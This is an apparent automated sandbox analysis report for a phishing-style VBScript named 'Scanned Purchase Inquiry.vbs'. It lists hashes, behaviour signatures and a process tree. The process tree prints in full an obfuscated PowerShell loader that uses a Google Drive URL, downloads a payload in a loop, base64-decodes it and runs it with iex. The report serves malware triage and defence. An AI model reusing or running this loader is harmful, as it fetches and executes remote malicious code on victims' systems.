Analysis

  • max time kernel
    296s
  • max time network
    302s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 06:53

General

  • Target

    Scanned Purchase Inquiry.vbs

  • Size

    6KB

  • MD5

    e591827fd78724ea077dbcab839877fa

  • SHA1

    5e976d2ae49fb4e220cf59ddad3cfd6d45c3f37e

  • SHA256

    2342f9df70eed24aaba57e7a230fd8759fe97ccb97ac42735f174bbea6df1ee9

  • SHA512

    a2b7592f1c174d40470d3ce7ae9c959b2a20bc0bcd451504260cd86c2b14a0184c85cd52d80b9ac2baa4e1a9277f6a46b82b0c82701bd1a77cb645c23b5d3441

  • SSDEEP

    96:lmXU2FvTJj01wG8wau6OZvlAA85fs9rXsYKIqIx1Xqn71eYjfnLn+h:lmk2VTJqwXurAu9gGX1u71eA+h

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Scanned Purchase Inquiry.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Finmotoriske='Precarium';$syntaksanalysernes=$host.PrivateData;If ($syntaksanalysernes) {$Udfaldsvinklers++;}function Angivelige($Hullet){$Processual=$Hullet.Length-$Udfaldsvinklers;for( $Ukuelig=1;$Ukuelig -lt $Processual;$Ukuelig+=2){$svkkelse+=$Hullet[$Ukuelig];}$svkkelse;}function syngende($Conjugations){ . ($Lrdommene) ($Conjugations);}$Leapfrogs=Angivelige '.M.o.zbiFl l.a / 5s..0E ,(sW i,nfdAo,wTsi .NLTG A1 0I. 0E;s WHi n 6H4I;O ExD6s4T;. Br v : 1 2.1 . 0A)B ,GseIc ksoT/ 2a0p1B0 0 1N0,1. JFPi r e f.oBxs/K1P2P1M.V0 ';$Jage=Angivelige ' UUsCeVr -,ANgBeTn t ';$Unsabered=Angivelige 'IhEtct p s :,/ / d.rAi,v e,.Pg o o g lseM.,cHo mU/.ubc,?VeCx.p.oCr tP=sdNoHw nHlsoBa.d,&.iPdE=T1,z PU7 i.FOzF0 OAfsdB9.M kslUs aFx oMe nPLgvFlC3Ri.fFN c E.d.Y.9s ';$Tiptoppishness=Angivelige 'U>F ';$Lrdommene=Angivelige 'fiKeBx ';$Displayets='Crosswords';$Cuculoid = Angivelige 'PeGc h,ok C%Ca,p,pDd a,tsau%,\sA aPdPs e.l gIrLa vPeOr sA.IE l.b. ,& &D ReOcHh oA t ';syngende (Angivelige 'N$sgKlso bDa,l : Pdy o m e tHrLas= ( cKmKd, ,/hcd E$ C uMcsu lPoAiUdP)A ');syngende (Angivelige 'd$ g lso bUa l : ORpsh,iRdBiao u,sB=p$UUsn.ssasbIeMr,e.dA. smpMl.iAtK(A$vT.iDpPt o,p,psi sGh nReFsHsV), ');syngende (Angivelige 'L[ NIeFt . sBeErAv,i.cNe PkoBi,nGt MDa n aPgHe.rE],:,:ss e c,uOr i t yTPNrNoKtWoFc.o lC =T p[ N e,t..,s eAc,uAr,iRt yVPPr o t.oIc oTl T yTp eD]F: : TPlIsl1s2 ');$Unsabered=$Ophidious[0];$Nonseclusive244= (Angivelige ',$ gRl o,b afl,: RFesnGd.e s,t,e n sBs pDrTo gVs 5 3s=PN,esw,-sOWbDj eBc tA BsTy.s,t,e,m .RN e.ts.FW,eUbHC lAi e.n.t');$Nonseclusive244+=$Pyometra[1];syngende ($Nonseclusive244);syngende (Angivelige ' $.RRecnDd.e s tsesnssRsMp r.o gEss5t3D.BHpe.a,dEe rNsR[c$.Jsa,gMeF]E=M$.LHe,a p fBrEoPgssK ');$Damlike=Angivelige 'T$LRueNn.d e sAtEeTn.s.s p rGoIgRs.5R3 .MD o w n,lPoOa.dsFPiRlYeK( $TU n,sTa.bee r eAdC, $FsGhIiGv o,o s ) ';$shivoos=$Pyometra[0];syngende (Angivelige ' $.g lMo,b.aUl,:LR,esa kPt i,ogn,s d rMeDv.e tM= ( TVe sGt.-UP.aLt hN s$ s.hsiWv oToBs.) ');while (!$Reaktionsdrevet) {syngende (Angivelige 'U$sg lFo b a.lI: U,nCe.nEc laossCe d = $stUrsuTe. ') ;syngende $Damlike;syngende (Angivelige ' sAt.a.r tF-.s l.e e pi ,4. ');syngende (Angivelige 'r$NgBlsoTbRa lP:PRUe aAk,t i o n sPd r eAv e t = (KTLe sut.-,P aPt.h P$.s hAi.v oco sL)a ') ;syngende (Angivelige 'R$ g l.o,b,a,l :sMFaJt.cHhub osa rPd =D$PgGl o b,a l :BF oVrstKo,l kfnPiUnsg sO+ + % $HOPp,h iDdsiso,u s .IcBo u n,t, ') ;$Unsabered=$Ophidious[$Matchboard];}$Ganglion=299396;$Charoses=25963;syngende (Angivelige '.$.g,l o bKasl : LLo,f t sPm,eAn,3K .=V ,GTe tU- CBo n tAeFnttP ,$ s.h iCv.oBo.s, ');syngende (Angivelige 's$TgslAo bAaElR:FL asnCcGestGtsesrEsG =s [,sUyEs tNesmR..C,o.nPv esr t ] :s:.FErso.mRBIa,s eN6P4Gs.t r iNnEg.(s$,L oTf tKsFmMe,n,3,)B ');syngende (Angivelige 'T$ gDl osbHatl,: BDrTuHmCm aUg e mC P= A[UsLyssstIeCm..nTUebxHtN.cEIn cFoPd iLn,gA].:,: AHsVCTIGIG.HG e tBsCt.r i nsg.(s$HL abnNcBeAt.t e,r s,)f ');syngende (Angivelige 'C$sgBlFosbIaTl :.A r.b e j,d sBo p g.asv esnN=D$ B r u m m.a,gIeKmH.As u bMsst r iAn,g (U$sG a n gKl iKoKn ,,$BCMh a,rJo sneHs,)P ');syngende $Arbejdsopgaven;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Aadselgravers.Elb && echo t"
        3⤵
          PID:2596

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2740-4-0x000007FEF486E000-0x000007FEF486F000-memory.dmp

      Filesize

      4KB

    • memory/2740-5-0x000007FEF45B0000-0x000007FEF4F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2740-6-0x000000001B180000-0x000000001B462000-memory.dmp

      Filesize

      2.9MB

    • memory/2740-7-0x0000000002320000-0x0000000002328000-memory.dmp

      Filesize

      32KB

    • memory/2740-8-0x000007FEF45B0000-0x000007FEF4F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2740-9-0x000007FEF45B0000-0x000007FEF4F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2740-10-0x000007FEF486E000-0x000007FEF486F000-memory.dmp

      Filesize

      4KB

    • memory/2740-11-0x000007FEF45B0000-0x000007FEF4F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2740-12-0x000007FEF45B0000-0x000007FEF4F4D000-memory.dmp

      Filesize

      9.6MB

    • memory/2740-13-0x000007FEF45B0000-0x000007FEF4F4D000-memory.dmp

      Filesize

      9.6MB